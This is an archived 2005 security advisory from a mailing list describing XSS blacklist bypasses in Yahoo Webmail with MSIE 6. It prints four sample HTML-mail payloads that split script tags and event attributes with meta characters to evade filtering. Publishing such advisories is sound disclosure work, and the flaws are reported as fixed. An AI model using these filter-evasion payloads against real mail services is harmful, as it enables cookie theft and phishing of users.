lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4358B832.1060308@sec-consult.com>
Date: Fri, 21 Oct 2005 11:43:14 +0200
From: Bernhard Mueller <research@...-consult.com>
To: bugtraq@...urityfocus.com,
	Full Disclosure <full-disclosure@...ts.grok.org.uk>
Subject: SEC-CONSULT-SA-20051021-0: Yahoo/MSIE XSS


SEC-CONSULT Security Advisory 20051021-0
===================================================================================
                  title: Yahoo/MSIE XSS
                program: Yahoo Webmail in combination with MSIE 6.0
                         (maybe other browsers)
               homepage: www.yahoo.com
                  found: 2005-04
                     by: SEC-Team / SEC-CONSULT / www.sec-consult.com
===================================================================================

Vulnerabilty overview:
---------------

Since april 2005 SEC-Consult has found 5+ serious vulnerabilities within
Yahoo's webmail systems.
All of them have been fixed in the production environment. Nevertheless
SEC-Consult believes that input-validation thru blacklists can just be a
temporary solution to problems like this. From our point of view there
are many other applications vulnerable to this special type of problem
where vulnerabilities of clients and servers can be combined.

Vulnerabilty details:
---------------

1) XSS / Cookie-Theft

Yahoos blacklists fail to detect script-tags in combination with special
characters like NULL-Bytes and other META-Characters. This leaves
Webmail users using MSIE vulnerable to typical XSS / Relogin-trojan /
Phishing attacks.

2) Some XSS Examples from our advisories

Excerpt from HTML-mails:

================================================================================================
SCRIPT-TAG:
---cut here---
<h1>hello</h1><s[META-Char]cript>alert("i have you
now")</s[META-Char]cript></br>rrrrrrxxxxx<br>
---cut here---
================================================================================================
OBJECT-TAG:
---cut here---
<objec[META-Char]t classid="CLSID:D27CDB6E-AE6D-11cf-96B8-444553540000">
<param name="movie"
value="http://[somewhere]/yahoo.swf"></obje[META-Char]ct>
---cut here---
================================================================================================
ONERROR-Attribute:
---cut here---
<img src="http://dontexist.info/x.jpg" one[META-Char]rror="alert('i have
you now')">uargg</p>
---cut here---
================================================================================================
ONUNLOAD-Attribute:
---cut here---
</body><body onun[META-Char]load=alert('i have you
now')><br></br><p>somewords</p></body></html>
---cut here---
================================================================================================


Recommended hotfixes for webmail-users
---------------

Do not use MS Internet-Explorer.


Recommended fixes
---------------

Do not use blacklists on tags and attributes. Whitelist
special/meta-characters.


Vendor status:
---------------
Vulnerabilities have been fixed.


General remarks
---------------
We would like to apologize in advance for potential nonconformities
and/or known issues.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC-Team / www.sec-consult.com /
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ